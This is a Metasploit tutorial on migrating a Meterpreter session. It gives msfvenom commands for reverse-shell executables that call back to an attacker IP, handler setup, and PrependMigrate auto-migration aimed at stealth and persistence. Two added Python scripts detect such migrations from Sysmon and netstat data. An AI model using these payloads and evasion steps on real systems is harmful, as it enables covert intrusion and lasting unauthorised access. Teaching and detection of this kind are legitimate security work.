
Metasploit : The migrate Command

Why Use migrate

Reasons to Migrate:

  • Stability: The process the payload first runs in (cmd.exe, or the dropped geek.exe) may terminate, and the session dies with it.
  • Stealth: Defensive tools monitor suspicious processes.
  • Compatibility: You may need to shift from x86 to x64 environments or vice versa.

The migrate command helps by relocating your Meterpreter session to a more appropriate process like explorer.exe.

Payload Generation (Without Migration)

Generate a basic Meterpreter reverse shell:

msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.100 LPORT=4444 \
-f exe -o geek.exe

  • LHOST: Your attack machine’s IP.
  • LPORT: Listening port.
  • Output: geek.exe will be the executable you deliver to the victim.

Setting Up the Listener

Start Metasploit and configure the handler:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
exploit

Wait for the victim to run geek.exe.

Manual Migration by Process Name and PID

Once the payload is executed and you gain a session:

[*] Meterpreter session 1 opened

Step 1: List Running Processes

meterpreter> ps

Example output:

 PID   Name
 ----  ---------------
 5200  explorer.exe
 7088  geek.exe

Step 2: Migrate Using Process Name

meterpreter> migrate -N explorer.exe

Step 3: Verify Current Process

meterpreter> getpid
Current PID: 5200

Step 4: Confirm Original Process is Gone

meterpreter> ps -S geek.exe
(No results – successful migration!)

Migrating Using Process ID (Alternative)

meterpreter> migrate 5200
meterpreter> getpid
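From the defender's side, a migration like the one above shows up in endpoint telemetry as a thread created in the target process by another process: with Sysmon this is Event ID 8 (CreateRemoteThread), where SourceImage is the dropper and TargetImage is the process it moved into. The script below is an added example, not from the original page or the Metasploit project. It parses constructed, simplified text renderings of Sysmon Event 8 records (real events are EVTX/XML, and the field names are taken from Sysmon) and flags remote threads into the high-value targets this page lists from any source image not on an illustrative allowlist; the allowlist and the sample PIDs are assumptions, not a vetted baseline.

```python
"""Flag Sysmon Event ID 8 (CreateRemoteThread) records that look like
process migration: an unexpected source image starting a thread inside a
high-value target such as explorer.exe or lsass.exe.

Added example (not from the original page or the Metasploit project).
Assumptions: the input is a simplified, constructed text rendering of
Sysmon Event 8 fields; the allowlist below is illustrative only.
"""
from dataclasses import dataclass

# Constructed sample records, one event per line, "Field: value" pairs
# separated by " | ". Real Sysmon events are XML/EVTX; this is a stand-in.
SAMPLE_EVENTS = """\
EventID: 8 | SourceImage: C:\\Users\\bob\\Downloads\\geek.exe | TargetImage: C:\\Windows\\explorer.exe | StartFunction: - | SourceProcessId: 7088 | TargetProcessId: 5200
EventID: 8 | SourceImage: C:\\Windows\\System32\\csrss.exe | TargetImage: C:\\Windows\\explorer.exe | StartFunction: - | SourceProcessId: 612 | TargetProcessId: 5200
EventID: 1 | Image: C:\\Windows\\explorer.exe | CommandLine: explorer.exe
EventID: 8 | SourceImage: C:\\Windows\\Temp\\auto_geek.exe | TargetImage: C:\\Windows\\System32\\lsass.exe | StartFunction: - | SourceProcessId: 8064 | TargetProcessId: 700
"""

# Processes an operator is likely to migrate into (the page's own list).
SENSITIVE_TARGETS = {"explorer.exe", "svchost.exe", "winlogon.exe", "lsass.exe"}

# Illustrative allowlist of images that legitimately create remote threads
# on Windows; tune to your own baseline (assumption, not a standard).
ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}


@dataclass(frozen=True)
class Alert:
    source_image: str
    target_image: str
    source_pid: int
    target_pid: int
    reason: str


def parse_event(line):
    """Turn one 'Field: value | Field: value' line into a dict."""
    fields = {}
    for part in line.split(" | "):
        key, _, value = part.partition(": ")
        if key:
            fields[key.strip()] = value.strip()
    return fields


def basename(path):
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_migration(text):
    """Return one Alert per CreateRemoteThread event whose target is a
    sensitive process and whose source is not on the allowlist."""
    alerts = []
    for line in text.splitlines():
        ev = parse_event(line)
        if ev.get("EventID") != "8":
            continue  # only CreateRemoteThread records matter here
        src, tgt = ev["SourceImage"], ev["TargetImage"]
        if basename(tgt) not in SENSITIVE_TARGETS:
            continue
        if src.lower() in ALLOWED_SOURCES:
            continue
        reason = "remote thread into %s from unexpected image" % basename(tgt)
        if "\\users\\" in src.lower():
            reason += " (source lives under a user profile)"
        alerts.append(Alert(src, tgt, int(ev["SourceProcessId"]),
                            int(ev["TargetProcessId"]), reason))
    return alerts


if __name__ == "__main__":
    for a in detect_migration(SAMPLE_EVENTS):
        print("%s -> %s (pid %d -> %d): %s" % (a.source_image, a.target_image,
                                              a.source_pid, a.target_pid, a.reason))
```

Against the constructed records this raises two alerts: geek.exe (7088) into explorer.exe (5200), matching the session shown above, and auto_geek.exe into lsass.exe. The csrss.exe event is suppressed by the allowlist, which is the trade-off to be aware of: anything you allowlist becomes a blind spot, so pair this with Sysmon Event ID 10 (ProcessAccess) and with the network-connection check for the target process.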

Auto-Migration with PrependMigrate

Step 1: Create Payload That Auto-Migrates

msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.100 LPORT=4444 \
PrependMigrate=true \
PrependMigrateProcess=explorer.exe \
-f exe -o auto_geek.exe

Step 2: Configure Handler Again

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
exploit

Step 3: Check Migration Success

meterpreter> getpid
Current PID: 5200
meterpreter> ps -S auto_geek.exe
(No results – auto-migration successful)

Testing Persistence After Kill

Step 1: Find Original Payload Process

meterpreter> ps -S auto_geek.exe

Assume PID is 8064.

Step 2: Kill It

meterpreter> kill 8064

Step 3: Check Session Still Works

meterpreter> sysinfo
Computer        : VICTIM-PC
OS              : Windows 10 (Build 19044).
Architecture    : x64
Meterpreter     : x86/windows

If the session is still active, migration worked!

Conclusion

The migrate command is essential for long-lasting access and stealth in a post-exploitation environment. You can:

  • Migrate manually to trusted processes.
  • Use PrependMigrate for stealth automation.
  • Retain sessions even after the original dropper is killed.

Recommended Process Targets

  • explorer.exe: Always running and stable.
  • svchost.exe: Common and trusted.
  • winlogon.exe or lsass.exe: Powerful, but migrating into them requires elevated privileges.
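The flip side of this list is that these processes are also the ones a defender should watch most closely: after a migration, the reverse_tcp session's socket is owned by explorer.exe or svchost.exe, not by the dropper, so a process-to-connection correlation is one of the cheapest ways to spot it. The script below is an added example, not from the original page or Metasploit. It parses a constructed netstat -ano style table plus a constructed PID-to-image map and flags established TCP connections owned by the four processes above to remote ports outside an illustrative "expected" set; that port baseline is an assumption for demonstration, not vendor guidance.

```python
"""Triage helper: given netstat-style output and a PID-to-image map, flag
established connections owned by high-trust system processes (the usual
migration targets) to remote ports they are not expected to use.

Added example, not from the original page or Metasploit. Sample tables
are constructed; the expected-port sets are illustrative assumptions.
"""
import ipaddress
from collections import namedtuple

# Constructed "netstat -ano" style rows: Proto, Local, Remote, State, PID.
SAMPLE_NETSTAT = """\
TCP    192.168.1.50:49712   192.168.1.100:4444   ESTABLISHED   5200
TCP    192.168.1.50:49720   40.126.31.1:443      ESTABLISHED   1180
TCP    192.168.1.50:135     0.0.0.0:0            LISTENING     904
UDP    0.0.0.0:500          *:*                                700
"""

# Constructed PID -> image map (what tasklist or the page's ps output shows).
SAMPLE_PROCS = {5200: "explorer.exe", 1180: "svchost.exe",
                904: "svchost.exe", 700: "lsass.exe"}

# Remote ports these processes are commonly expected to reach outbound.
# Assumption for illustration; derive your own baseline from real telemetry.
EXPECTED_REMOTE_PORTS = {
    "explorer.exe": {80, 443},
    "svchost.exe": {53, 80, 123, 443},
    "winlogon.exe": set(),
    "lsass.exe": {88, 389, 445, 636},
}

Finding = namedtuple("Finding", "pid image remote_ip remote_port reason")


def parse_netstat(text):
    """Return (proto, local, remote, state, pid) tuples; UDP rows have no state."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] not in ("TCP", "UDP"):
            continue
        proto, local, remote = parts[0], parts[1], parts[2]
        state = parts[3] if len(parts) == 5 else ""
        rows.append((proto, local, remote, state, int(parts[-1])))
    return rows


def split_endpoint(endpoint):
    """'host:port' -> (host, port as int or None for wildcards)."""
    host, _, port = endpoint.rpartition(":")
    return host, (int(port) if port.isdigit() else None)


def find_suspicious(netstat_text, procs):
    """Flag established TCP sessions owned by watched processes whose remote
    port is outside that process's expected set."""
    findings = []
    for proto, local, remote, state, pid in parse_netstat(netstat_text):
        if proto != "TCP" or state != "ESTABLISHED":
            continue
        image = procs.get(pid, "unknown").lower()
        if image not in EXPECTED_REMOTE_PORTS:
            continue
        rip, rport = split_endpoint(remote)
        if rport in EXPECTED_REMOTE_PORTS[image]:
            continue
        reason = "%s has an established TCP session to %s:%d on an unexpected port" % (
            image, rip, rport)
        try:
            if ipaddress.ip_address(rip).is_private:
                reason += " (peer is on the internal network)"
        except ValueError:
            pass  # hostnames or wildcards: skip the address classification
        findings.append(Finding(pid, image, rip, rport, reason))
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_NETSTAT, SAMPLE_PROCS):
        print(f.reason)
```

On the constructed data the only finding is explorer.exe (PID 5200) talking to 192.168.1.100:4444, which is exactly what the migrated session from this page would look like from the host's own connection table; the svchost.exe session to 443 passes because it matches the baseline. Port allowlists are a coarse filter (a handler on 443 would slip through), so treat this as a triage aid to combine with the remote-thread telemetry rather than a standalone detection.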